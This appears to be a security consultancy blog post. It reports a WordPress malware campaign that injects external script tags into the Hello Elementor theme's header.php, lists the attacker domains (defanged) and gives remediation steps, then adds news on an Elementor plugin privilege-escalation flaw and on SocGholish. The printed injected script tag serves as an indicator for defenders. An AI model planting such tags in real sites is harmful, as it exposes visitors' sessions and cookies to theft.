Malicious Script Injection on WordPress Sites
Recently, our team discovered a JavaScript-based malware affecting WordPress sites, primarily targeting those using the Hello Elementor theme. This type of malware is commonly embedded within legitimate-looking website files to load scripts from an external source. The malware injects a malicious external script into the theme’s header.php file, leading to harmful consequences for site owners and visitors.
Domains Involved:
- spadeanalytica[.]com
- uph-analytics[.]com
- awebstats[.]com
As of writing this article, 200+ websites are infected with this malware according to publicwww.com.
- https://publicwww.com/websites/%22uph-analytics.com%22/
- https://publicwww.com/websites/%22spadeanalytica.com%22/
- https://publicwww.com/websites/%22awebstats.com%22/
Infection Details
The malware is injected into the header.php file with the following code snippet.
<script src="https://spadeanalytica[.]com/s/analytics.js"></script> <script src="https://spadeanalytica[.]com/t/stat.js"></script>
SiteCheck detects these suspicious javascript codes as resources from a blacklisted domain.
Why Does This Happen?
In most cases, malware like this gains entry through outdated themes, plugins, or weak security practices. In this instance, the code is embedded within the theme’s header.php file. Attackers target core theme files since they load on every page and make an effective vector to propagate malicious behavior.
Why Is This Dangerous?
The injected script from an untrusted domain enables the attacker to control aspects of the website’s functionality, leading to issues such as:
- Stealing user information, including session data and cookies.
- Redirecting users to ad networks or spam sites, damaging site credibility.
- It can also affect a site’s SEO ranking. Sites flagged with malicious scripts can face penalties from search engines, reducing visibility and affecting traffic.
Remediation Steps
- Manually remove any unauthorized script tags referencing suspicious domains from header.php.
- Ensure your WordPress themes, plugins, and core files are up to date to prevent vulnerability exploits.
- Regularly scan your website with SiteCheck or another security tool to catch any malware early.
- Disable file editing in your WordPress configuration (wp-config.php) by adding
define('DISALLOW_FILE_EDIT', true);to reduce the risk of unauthorized changes. - Consider additional security measures like two-factor authentication, secure passwords, and strict user roles to harden your WordPress security further.
More on Sucuri
A security vulnerability has been disclosed in the popular WordPress plugin Essential Addons for Elementor that could be potentially exploited to achieve elevated privileges on affected sites.
The issue, tracked as CVE-2023-32243, has been addressed by the plugin maintainers in version 5.7.2 that was shipped on May 11, 2023. Essential Addons for Elementor has over one million active installations.
“This plugin suffers from an unauthenticated privilege escalation vulnerability and allows any unauthenticated user to escalate their privilege to that of any user on the WordPress site,” Patchstack researcher Rafie Muhammad said.
Successful exploitation of the flaw could permit a threat actor to reset the password of any arbitrary user as long as the malicious party is aware of their username. The shortcoming is believed to have existed since version 5.4.0.
This can have serious ramifications as the flaw could be weaponized to reset the password associated with an administrator account and seize full control of the website.
“This vulnerability occurs because this password reset function does not validate a password reset key and instead directly changes the password of the given user,” Muhammad pointed out.
The disclosure comes more than a year after Patchstack revealed another severe flaw in the same plugin that could have been abused to execute arbitrary code on compromised websites.
The findings also follow the discovery of a new wave of attacks targeting WordPress sites since late March 2023 that aims to inject the infamous SocGholish (aka FakeUpdates) malware.
SocGholish is a persistent JavaScript malware framework that functions as an initial access provider to facilitate the delivery of additional malware to infected hosts. The malware has been distributed via drive-by downloads masquerading as a web browser update.
The latest campaign detected by Sucuri has been found to leverage compression techniques using a software library called zlib to conceal the malware, reduce its footprint, and avoid detection.
“Bad actors are continually evolving their tactics, techniques, and procedures to evade detection and prolong the life of their malware campaigns,” Sucuri researcher Denis Sinegubko said.
“SocGholish malware is a prime example of this, as attackers have altered their approach in the past to inject malicious scripts into compromised WordPress websites.”
It’s not just SocGholish. Malwarebytes, in a technical report this week, detailed a malvertising campaign that serves visitors to adult websites with popunder ads that simulate a fake Windows update to drop the “in2al5d p3in4er” (aka Invalid Printer) loader.
“The scheme is very well designed as it relies on the web browser to display a full screen animation that very much resembles what you’d expect from Microsoft,” Jérôme Segura, director of threat intelligence at Malwarebytes, said.
The loader, which was documented by Morphisec last month, is designed to check the system’s graphic card to determine if it’s running on a virtual machine or in a sandbox environment, and ultimately launch the Aurora information stealer malware.
The campaign, per Malwarebytes, has claimed 585 victims over the past two months, with the threat actor also linked to other tech support scams and an Amadey bot command-and-control panel.
More on Hacker News
Alien Consulting can collaborate as a competent partner and help organizations avoid common security mistakes when operating
in the cloud, and provide the necessary guidance to consider the strategic aspects of planning and implementing a robust
cybersecurity plan covering all aspects of their IT operations.
Measuring the effectiveness of your cloud security posture can be done by implementing regular controls,
including vulnerability scans and penetration testing.
Organizations are always better prepared to succeed in their security with a consistent cadence of evaluations.
If you want an expert opinion on security, Alien Consulting can help you make the right decision without bias as a triangular consultant.
We work with the best in the world. We have nothing to sell here, our job is to guide you in the right decision.
It’s important not to include any information about your problem.
We are proactive defenses professional
